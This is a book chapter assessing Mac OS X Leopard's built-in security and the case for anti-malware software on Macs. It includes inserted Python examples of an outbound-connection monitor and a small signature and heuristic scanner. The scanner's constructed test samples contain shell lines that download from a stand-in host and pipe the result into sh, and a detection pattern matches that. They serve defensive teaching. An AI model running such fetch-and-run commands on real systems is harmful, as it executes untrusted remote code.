Malware Detection and the Mac
Solutions in this chapter:
■ Safe Out of the Box?
■ Principles of Anti-Malware Technology
■ Anti-Malware Products
■ Product Testing
Summary
Solutions Fast Track
Introduction
Now that you know what malware is, what, if anything, should you do about it? Apple contends that “Every Mac is secure right out of the box,” thanks to the proven foundation of Mac OS X. Apple engineers have designed Leopard with more security to protect your personal data and make your online life safer (see Figure 4.1).
We will look more closely at what Apple means by secure, and discuss whether and when the intrinsic security of OS X is enough to obviate the need for third-party security software. We’ll then go on to look at the basic principles of anti-malware protection, and then look at specific technologies in more detail.
Safe Out of the Box?
The Web page (www.apple.com/macosx/technology/security.html) in Figure 4.1 describes a number of features of Leopard’s out-of-the-box security that we can break down as follows:
■ Transparent and easy to use.
■ Easy to update and patch, which has always been one of the better features of Operating System (OS) X. As discussed in the last chapter, however, while it’s important to patch system and application software to close critical vulnerabilities, many (or most) malicious programs are not self-launching and don’t rely on system vulnerabilities such as buffer and stack overflows. They’re user-launched (or hybrid) and work by tricking the victim into running them. There are no patches for human gullibility.
■ Open source core. In other words, the entire BSD development community is looking at core code, and Apple developers are tapping into that resource in order to improve the security of core OS X components. This is a good thing, as is the fact that they work with CERT/CC, DHS, and so on, but it doesn’t necessarily have much of a bearing on malware issues, for the reason given in the previous point.
■ Danger Free Downloads. This describes the “tagging” feature whereby Safari, iChat, and Mail users are alerted if they’re about to open a downloaded application, and it even checks an application’s digital signature, where available. These features only mitigate danger (slightly), rather than removing it. Since this feature doesn’t really test whether or not the application is malicious, it leaves the decision as to whether it’s safe to execute to the user. If the user wasn’t expecting to execute an application, that may make them suspicious of that application, but that suspicion can be overcome by efficient social engineering.
■ Encryption, Virtual Private Network (VPN), and folder sharing issues, though important, are not really germane to current Macintosh (Mac) malware. By contrast, network shares are a major entry point for bots in the Windows world.
■ Sandbox testing sounds like a great idea, if you’ve come across sandboxing in the context of anti-malware technology. As it happens, what Apple has in mind is a fairly limited application of sandboxing. Leopard sandboxes some of its own helper applications, such as the Spotlight indexer, by restricting their access to other files and the network, and their ability to launch other applications. This will close one potential loophole, but it doesn’t restrict the ability of other programs (malware in particular) to cause damage.
At www.apple.com/macosx/features/300.html#security (see Figure 4.2), Apple describes another security feature called library randomization. This is similar to Vista’s Address Space Layout Randomization (ASLR), whereby system files are loaded at random addresses in memory, making it harder for malicious code to locate and call privileged functions. Where Vista uses one of 256 randomly assigned addresses, Leopard relocates system libraries to one of several thousand addresses.
Tools & Traps
Leopard is not OS X
Leopard is actually the fifth major revision of OS X, and some of its security features are very different from those of earlier versions. It’s obviously naïve to expect all users of earlier versions to pay for every upgrade. The fact that so many applications not only keep pace with OS X upgrades, but abandon support for previous versions with the same alacrity that Apple does, provides some incentive to do so. After all, even some open source developers have withdrawn support for versions earlier than 10.4 (Tiger). Some systems are incapable of running the latest versions without at least a memory upgrade, and perhaps not even then. And, somewhere in the world, there are still people running systems using OS 9.x or earlier, either from choice or because their hardware can’t handle OS X.
I’ll discuss the issues and options for computer users who can’t or won’t run the latest and greatest versions of Apple’s hardware and software later on in this section.
To their credit, Apple doesn’t make the mistake Jim Allchin of Microsoft made when he touted Vista’s ASLR as a significant anti-worm measure: “So even if there is a remote exploit on one machine, and a worm tries to jump from one machine to another, the probability of that actually succeeding is very small.” But you shouldn’t make that mistake either. Library randomization is not a bad idea, and it improves on the Vista model, but it’s not the death of malware.
There’s a much more detailed description of the Leopard security model at http://images.apple.com/macosx/pdf/MacOSX_Leopard_Security_TB.pdf. There is excellent stuff in there, and I don’t for a moment suppose that Apple is trying to mislead their customers, but statements such as, “You don’t have to be a security expert to configure your Mac to be secure at home or on the road, you just need to know how to turn on the computer. That’s because the default settings safely restrict how your Mac communicates on the network…” should not be mistaken for a guarantee of absolute safety. Take, for instance, the assertion that Leopard’s new application-based firewall “makes it easier for non-experts to get the benefits of firewall protection” (see Figure 4.3). Blocking incoming connections on a “per-application basis rather than on a per-port basis” is not completely cosmetic. It’s certainly less restrictive than a blanket refusal of “non-essential” network services, but again throws the decision as to “what applications are safe” onto the shoulders of the user.
Furthermore, Apple has not yet learned enough from the misfortunes of Windows users if the assumption here is that only incoming connections matter. If a personal (or corporate) firewall were enough to stop all malware, and you could assume that such a firewall could be configured with 100 percent security while leaving the system reasonably usable, and you could assume that a given system would be configured to that standard, perhaps it would be true. In the real world, however, we believe that it’s worth monitoring outbound traffic as well. If, for instance, a bot of some sort takes hold despite existing precautions, there’s the possibility of detecting it and mitigating its effects by stopping suspicious outbound traffic.
It’s reassuring that the more capable, more configurable IPFW firewall is still available for “expert users,” but this brings into question the usefulness of a turnkey firewall system. Doesn’t this argue that top-notch security is only available to those who have the expertise to configure a more professional two-way firewall (preferably at the perimeter rather than on the end-user’s desktop)? Actually, I believe that to be true, but it seems to contradict Apple’s “safe out-of-the-box” position. In any case, I have yet to see a firewall as secure as Marcus Ranum’s “Perfect Firewall” (now “The Ultimately Secure Deep Packet Inspection And Application Security System”) (see Figure 4.4).
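The outbound-monitoring point made above, as an added example that is not from the book: a small monitor over a constructed connection log that flags a process using an unexpected port and a process reconnecting to the same host at a fixed interval, the pattern a bot phoning home tends to leave. The log layout, application names, addresses and the expected-port set are assumptions for illustration.

```python
"""Outbound-connection monitor over a constructed connection log.
Added example (not the book's code): it shows what an inbound-only firewall
cannot notice, a process calling one host on an odd port at fixed intervals."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log; the line layout is an assumption for this example,
# not any real firewall's format.  Addresses are from documentation ranges.
SAMPLE_LOG = """\
2008-03-01T10:00:01 app=Safari dst=198.51.100.20 port=80
2008-03-01T10:00:03 app=Safari dst=198.51.100.20 port=443
2008-03-01T10:00:05 app=Mail dst=198.51.100.10 port=993
2008-03-01T10:00:10 app=Updater dst=192.0.2.5 port=6667
2008-03-01T10:01:10 app=Updater dst=192.0.2.5 port=6667
2008-03-01T10:02:10 app=Updater dst=192.0.2.5 port=6667
2008-03-01T10:03:10 app=Updater dst=192.0.2.5 port=6667
2008-03-01T10:03:30 app=iChat dst=198.51.100.77 port=5190
"""
LINE_RE = re.compile(r"^(\S+) app=(\S+) dst=(\S+) port=(\d+)$")

# Ports desktop applications are expected to use here (an assumption; a real
# deployment would derive this from its own policy or an observed baseline).
EXPECTED_PORTS = {25, 80, 143, 443, 587, 993, 995, 5190}

def parse_log(text):
    """Return a list of (timestamp, app, dst, port) tuples."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # lines that do not fit the layout are ignored
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
            records.append((ts, m.group(2), m.group(3), int(m.group(4))))
    return records

def unusual_ports(records):
    """Flag (app, dst, port) triples that use a port outside EXPECTED_PORTS."""
    return sorted({(app, dst, port) for _, app, dst, port in records
                   if port not in EXPECTED_PORTS})

def beacons(records, min_hits=3, tolerance=5.0):
    """Flag (app, dst, interval) where one app reconnects to one host at a
    near-constant interval, the regular call-home pattern a bot produces."""
    by_pair = defaultdict(list)
    for ts, app, dst, _ in records:
        by_pair[(app, dst)].append(ts)
    found = []
    for (app, dst), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= tolerance:
            found.append((app, dst, round(sum(gaps) / len(gaps))))
    return found
```

On the sample log, both checks single out the same process, which is the kind of corroboration worth requiring before blocking anything automatically.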
Having established a better understanding of what Apple means by “security”, perhaps it’s now easier to answer the question posed by Rich Mogull on the Mac news site TidBITS (http://db.tidbits.com/article/9511): “Should Mac Users Run Antivirus Software?” Mogull actually makes some very sound points.
■ “The reality is that today the Mac platform is relatively safe.” I might dispute his figures, but there are, as we’ve already seen, a tiny number of Mac-specific malicious programs (unfortunately, he doesn’t consider the diminished but not irrelevant macro virus issue), many of which are “aimed at versions of the Mac OS prior to Mac OS X (and thus have no effect on a modern Mac).” However, we should bear in mind that it’s not only Mac-specific malware that we should consider. As discussed in the previous chapter, some Mac users are still vulnerable to infection by application-specific malware such as Microsoft Office macro viruses, even though (intentional) damage from macro payloads is a negligible risk. Also, there’s the issue of heterogeneous malware transmission (HMT), whereby malware that can’t trigger directly on Macs is passed on to systems that are vulnerable. Mogull does acknowledge this phenomenon, though he doesn’t use that term. However, I’m not sure he (or other Mac users) recognize that this is not just a matter of taking precautions as a courtesy to Windows users, or even as a sop to corporate policy. It’s a vital component of responsible computing, and I’m sure that if and when Mac malware impacts seriously on the average Mac user’s computing experience, such users will expect Windows users to extend the same “courtesy” to them, by using security software that recognizes Mac threats as well as native Windows threats.
■ “… malicious software these days is driven by financial incentives, and it’s far more profitable to target the most dominant platform.” Certainly most malware is profit driven, and this undoubtedly has a bearing on the fact that it’s mostly the platform with the biggest market share that is targeted. Mogull quotes Adam J. O’Donnell (see also the previous chapter): “Game theory shows that an inflection point will come when the rate at which a malware author can reliably compromise a PC rivals that of the Mac market share. It is at this time you will see monetized, profitable Mac malware start popping up.” My only issue with this point is that Mogull treats it as a prediction. I’d say that it’s now a historical fact. That doesn’t mean that Mac malware for profit is a big deal at the moment, only that it already exists in some quantity, and is likely to become more of a problem rather than less.

Tools & Traps
Configuring the Perfect Firewall
Here are Marcus’ instructions for configuration of this superb defensive measure.
For best effect, install the firewall between the central processing unit (CPU) and the wall outlet. Place the jaws of the firewall across the power cord, and bear down firmly. Be sure to wear rubber gloves while installing the firewall. If the firewall is installed properly, all the lights on the CPU will turn dark and the fans will grow quiet. This indicates that the system has entered a secure state. For Internet use, install the firewall between the demarcation of the T1 to the Internet. Place the jaws of the firewall across the T1 line lead, and bear down firmly. When your Internet service provider’s network operations center calls to inform you that they have lost connectivity to your site, the firewall is correctly installed.
■ “Desktop AV software is also only a limited defense, and one that’s typically very resource intensive.” I think the claim here is that there are more effective ways of blocking malware that don’t involve the processing overhead entailed by the installation of memory-resident (on-access) AV software. In fact, this is a variation on the theme of “I don’t need desktop security because I have perimeter protection.” This might even be appropriate in some cases, depending on where you consider your perimeter to be. The Internet is not the only threat vector. One of the most common threat vectors at the time of writing is USB and other devices and media that can use the “Autorun” facility (autorun.inf) common in the Windows environment. OS X does not generally support such self-launching programs and scripts, but there is nothing to stop the unwary user launching malicious software from CDs and flash drives.
In this article, however, Mogull extends this thought to include the use of e-mail accounts such as Gmail and Hotmail that incorporate filtering for spam and malware. Not a bad thought, though some kinds of spam and scam often get through these filters. Malicious attachments get through more rarely (and Mac malware hardly ever at present), but it happens.
Clearly, AV programs can’t catch all malware, despite the huge improvements in the development of proactive detection using heuristic and behavioral analysis, and it can be argued (as Mogull argues) that for Mac users (and, indeed, Vista users) the overhead does not justify the “intrusive” and “resource-intensive” encroachment of AV software. (Actually, he’s talking primarily about full system scans, which are rarely necessary on systems where a competent on-access scanner is run. I’ll talk more about these technological issues later in this chapter.) For a Mac user, I agree that there is still some scope for the individual user to make his own decision about whether the trade-off between cost (both unit cost and resource impact) and security is justified; there is less scope for this in a corporate environment. However, I wouldn’t and don’t care to run an unprotected Windows PC, even one that operates under Vista.

Damage & Defense
What Do We Mean by Known Malware?
Mogull also claimed that “By even the most positive assessments, AV software catches only 85 to 95 percent of known malicious software (viruses, worms, Trojans, and other nasty stuff) in the wild.” Actually, AV software should catch 100 percent of known malware, that is, malware for which it has signature detection, which should, in turn, include all malware that is technically in the wild, that is, malware validated as being “In the Wild” by inclusion in the WildList (see www.wildlist.org). (It’s true that anti-malware products do sometimes fail WildList testing; see Figure 4.5.) But it’s the unknown software (i.e., software for which it has no signature) that is the main differentiator between good and indifferent commercial products in the wider world of AV (the WildList has rarely included Mac-specific malware to date). Nowadays, it’s difficult to argue that AV detects anywhere near as much as 85 percent of unknown malware. However, this is not a reason not to use it unless you have a much better alternative or you have grounds for thinking that the risk is outweighed by other considerations.
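The sidebar’s distinction between known malware (a signature exists, so detection should be 100 percent) and unknown malware, together with the later point about a product’s ability to detect generically rather than per sample, as an added example that is not from the book: a miniature scanner with one exact signature and one generic rule, run over constructed, harmless text files. The sample contents, detection names and the generic rule are assumptions for illustration.

```python
"""Miniature scanner contrasting signature detection of known malware with
generic detection of an unseen variant.  Added example, not the book's code;
the samples are constructed stand-ins (harmless text), not real malware."""
import hashlib
import re

# Constructed samples standing in for files on disk.
KNOWN_SAMPLE = b"#!/bin/sh\ncurl http://files.example/drop | sh\n"
VARIANT = b"#!/bin/sh\n# v2\ncurl http://files.example/drop2 | sh\n"
BENIGN = b"#!/bin/sh\necho hello\n"

# Signature database: a whole-file hash and a byte sequence, both taken from
# KNOWN_SAMPLE, much as a vendor derives signatures from a submitted sample.
SIGNATURES = {
    "sha256": {hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "Example/Known.A"},
    "bytes": {b"http://files.example/drop |": "Example/Known.A"},
}

# One generic rule: a shell script that pipes a download straight into an
# interpreter.  Deliberately broad so it can match samples never seen before.
GENERIC_RULES = [
    (re.compile(rb"(curl|wget)\s+\S+\s*\|\s*(sh|bash)\b"), "Generic/PipeToShell"),
]

def scan_known(data):
    """Signature pass: a name only if this exact sample (or its byte string) is known."""
    name = SIGNATURES["sha256"].get(hashlib.sha256(data).hexdigest())
    if name:
        return name
    for pattern, name in SIGNATURES["bytes"].items():
        if pattern in data:
            return name
    return None

def scan_generic(data):
    """Heuristic pass: matches a behaviour pattern rather than one sample."""
    for rule, name in GENERIC_RULES:
        if rule.search(data):
            return name
    return None

def scan(data):
    """Run signatures first, then generic rules; report which layer caught it."""
    name = scan_known(data)
    if name:
        return ("signature", name)
    name = scan_generic(data)
    if name:
        return ("generic", name)
    return None
```

The variant defeats both exact signatures with a one-character change, which is why the WildList-style "known" figure says little about how a product fares against what it has not seen.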
■ “If you engage in risky online behavior, use AV software and definitely switch to Firefox with NoScript.” While opinion varies on what constitutes “risky” behavior, I’m not about to argue that AV software is a bad idea, and NoScript is definitely worth considering.
■ “If you use your Mac in an enterprise environment with AV policies, you still need to use AV software.” I once worked in an environment where it was considered unnecessary to protect Macs, but it only took me about three years to change managerial minds.
■ “If you run Windows on your Mac via Boot Camp or virtualization, install Windows AV software. Even if you’re running Mac AV tools, they won’t help you when you’re running Windows. You need to protect that partition or virtual machine just as if it were any other Windows system.” I couldn’t agree more. Actually, it’s an argument I was making forcibly in the mid-1990s, but the grounds for the argument haven’t changed, even though the emulators have.
Anti-malware Technology
Why anti-malware rather than AV? Well, as we’ve already seen, viruses are not the only problem. In fact, they’re not necessarily the most important class of malware any more. There are plenty of alternatives to AV. Programs that describe themselves as anti-spyware, anti-Trojan, or anti-rootkit are available all over the Internet. Some of them aren’t anti-malware applications at all. We sometimes describe these as rogue anti-malware (or anti-spyware) applications, and as mentioned before, they’re starting to appear for the Mac, though not in the same quantities as their Windows equivalents. These are at best useless and frequently malicious. But there are plenty of legitimate and useful programs that detect a subset of the whole class of malicious software. Confusingly, some of them are marketed by the same companies who also market a full-blown anti-malware/AV product line. For instance, many vendors now have a separate (often free) anti-rootkit program.
This doesn’t mean that what we used to call AV software (and still do sometimes) only detects viruses. Most commercial AV software actually detects a wider range of malware than specialist detection products that are sometimes marketed as necessary “because AV products only detect viruses.” However, a more specialized program may detect more of whatever it is it detects than an AV program. Even this can vary depending on such factors as the program’s ability to detect generically rather than detecting specific malware. Also, mainstream AV vendors may have particularly efficient co-operative sample sharing mechanisms, established over many years of experience and hard-won trust between vendors.
In fact, most of what most people describe indiscriminately as viruses should really be described as malware. That doesn’t mean that antivirus (AV) products won’t or shouldn’t attempt to detect it. It may simply be that our ability to detect other malware continues to be underestimated because we’ve been (fairly) successful at detecting replicating malware (viruses and worms) over so many years.
Of course, AV generally detects all known viruses (i.e., viruses for which a signature exists) for the platform on which they are designed to work. That means that commercial Windows AV generally detects all the known viruses for Windows and DOS.